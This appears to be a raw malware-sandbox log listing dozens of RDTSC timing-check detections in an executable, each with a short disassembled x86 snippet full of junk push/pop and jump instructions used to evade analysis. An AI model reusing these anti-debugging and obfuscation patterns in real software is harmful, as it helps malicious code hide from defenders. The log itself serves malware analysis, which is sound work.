                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1040187 second address: 1040191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F022CCCFB06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10543D7 second address: 10543DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10543DF second address: 10543EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F022CCCFB0Bh 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 105426C second address: 1054275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10567F7 second address: 10567FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10567FB second address: 1056801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1058267 second address: 105828D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F022CCCFB08h 0x0000000e jmp 00007F022CCCFB12h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 105828D second address: 1058291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10583F7 second address: 10583FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 10583FD second address: 1058401 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1058401 second address: 1058425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jbe 00007F022CCCFB06h 0x00000011 jmp 00007F022CCCFB12h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1058425 second address: 105842B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 105842B second address: 1058431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 105AB0A second address: 105AB0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 105AB0E second address: 105AB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F022CCCFB06h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 105AB1D second address: 105AB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 105AB22 second address: 105AB2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F022CCCFB06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 105AB2C second address: 105AB68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C80053Eh 0x00000007 jmp 00007F022C800547h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jl 00007F022C80053Eh 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 106D20C second address: 106D210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 106D649 second address: 106D677 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C80053Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F022C80053Eh 0x00000011 jmp 00007F022C80053Ah 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 106DD19 second address: 106DD35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F022CCCFB06h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F022CCCFB0Fh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 106DD35 second address: 106DD39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1070E99 second address: 1070EE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a jnl 00007F022CCCFB1Bh 0x00000010 push dword ptr [ebp+122DB65Ah] 0x00000016 mov edx, dword ptr [ebp+122D394Ch] 0x0000001c push 2665EC86h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F022CCCFB12h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1070EE5 second address: 1070EEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1073C29 second address: 1073C4D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnl 00007F022CCCFB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007F022CCCFB15h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 1073C4D second address: 1073C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8BD53 second address: F8BD58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8BF53 second address: F8BF6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F022C800544h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F8BF6B second address: F8BF6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 52F0308 second address: 52F0323 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800547h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 52F0323 second address: 52F0329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 52F0329 second address: 52F032D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 52F032D second address: 52F0331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 52F0331 second address: 52F0374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F022C80053Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F022C800540h 0x00000014 mov ebp, esp 0x00000016 jmp 00007F022C800540h 0x0000001b mov edx, dword ptr [ebp+0Ch] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 52F0374 second address: 52F0378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 52F0378 second address: 52F0395 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 52F0395 second address: 52F039B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 52F039B second address: 52F039F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 52F039F second address: 52F03B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ah, 68h 0x00000010 mov bl, DCh 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 52F03E1 second address: 52F03FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F022C800547h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 531075A second address: 53107B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F022CCCFB11h 0x00000009 and si, B736h 0x0000000e jmp 00007F022CCCFB11h 0x00000013 popfd 0x00000014 jmp 00007F022CCCFB10h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F022CCCFB17h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53107B3 second address: 5310814 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F022C800547h 0x00000011 sub cx, 5F2Eh 0x00000016 jmp 00007F022C800549h 0x0000001b popfd 0x0000001c mov bx, ax 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310814 second address: 5310823 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310823 second address: 5310835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx ebx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov edi, esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310835 second address: 5310877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, di 0x00000007 popad 0x00000008 push ebp 0x00000009 jmp 00007F022CCCFB0Ah 0x0000000e mov dword ptr [esp], ecx 0x00000011 pushad 0x00000012 mov eax, 2C409E4Dh 0x00000017 pushfd 0x00000018 jmp 00007F022CCCFB0Ah 0x0000001d or ecx, 03152968h 0x00000023 jmp 00007F022CCCFB0Bh 0x00000028 popfd 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push edi 0x0000002f pop ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310877 second address: 531087C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 531087C second address: 53108C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007F022CCCFB0Ch 0x00000012 or ch, FFFFFFF8h 0x00000015 jmp 00007F022CCCFB0Bh 0x0000001a popfd 0x0000001b pop esi 0x0000001c push ebx 0x0000001d call 00007F022CCCFB14h 0x00000022 pop esi 0x00000023 pop ebx 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53108C9 second address: 53108CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53108CD second address: 53108D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53108D3 second address: 53108D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53108D9 second address: 53108EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov esi, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53108EB second address: 53108F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53108F0 second address: 5310907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F022CCCFB13h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310907 second address: 5310937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 mov bh, ch 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ecx, edx 0x00000019 push edi 0x0000001a pop eax 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310A02 second address: 5310A42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F022CCCFB19h 0x00000016 add cl, 00000056h 0x00000019 jmp 00007F022CCCFB11h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310A42 second address: 5310A5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F022C80053Eh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310A5B second address: 5310A65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 2C9A5954h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310A65 second address: 5310A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 leave 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b call 00007F022C800542h 0x00000010 pop esi 0x00000011 jmp 00007F022C80053Bh 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310A8F second address: 5310A95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310A95 second address: 5310A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310A99 second address: 5300049 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c cmp eax, 00000000h 0x0000000f setne al 0x00000012 jmp 00007F022CCCFB02h 0x00000014 xor ebx, ebx 0x00000016 test al, 01h 0x00000018 jne 00007F022CCCFB07h 0x0000001a sub esp, 04h 0x0000001d mov dword ptr [esp], 0000000Dh 0x00000024 call 00007F023121D0FBh 0x00000029 mov edi, edi 0x0000002b jmp 00007F022CCCFB16h 0x00000030 xchg eax, ebp 0x00000031 jmp 00007F022CCCFB10h 0x00000036 push eax 0x00000037 pushad 0x00000038 mov esi, edi 0x0000003a mov si, bx 0x0000003d popad 0x0000003e xchg eax, ebp 0x0000003f jmp 00007F022CCCFB0Fh 0x00000044 mov ebp, esp 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300049 second address: 530004D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 530004D second address: 5300068 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300068 second address: 53000AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c jmp 00007F022C80053Eh 0x00000011 xchg eax, ebx 0x00000012 jmp 00007F022C800540h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53000AE second address: 53000B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53000B2 second address: 53000B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53000B6 second address: 53000BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53000BC second address: 53000D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C80053Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cl, dl 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53000D7 second address: 53000DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53000DC second address: 53000E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53000E2 second address: 5300104 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300104 second address: 5300117 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C80053Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300117 second address: 530011D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 530011D second address: 530014B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C80053Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F022C80053Fh 0x00000012 mov cx, 32FFh 0x00000016 popad 0x00000017 xchg eax, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 530014B second address: 530014F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 530014F second address: 5300166 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800543h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300166 second address: 530016C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 530016C second address: 5300170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53001AB second address: 53001B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53001B1 second address: 53001D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C80053Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F022C80053Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53001D1 second address: 53001E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F022CCCFB0Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53001E3 second address: 530020C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C80053Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F022C800545h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300444 second address: 5300466 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 5ADDh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 js 00007F022CCCFB6Bh 0x0000000f pushad 0x00000010 mov si, 0895h 0x00000014 mov si, 9911h 0x00000018 popad 0x00000019 cmp dword ptr [ebp-14h], edi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300466 second address: 530046A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 530046A second address: 530046E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 530046E second address: 5300474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300474 second address: 530048F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F022CCCFB17h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 530048F second address: 5300493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
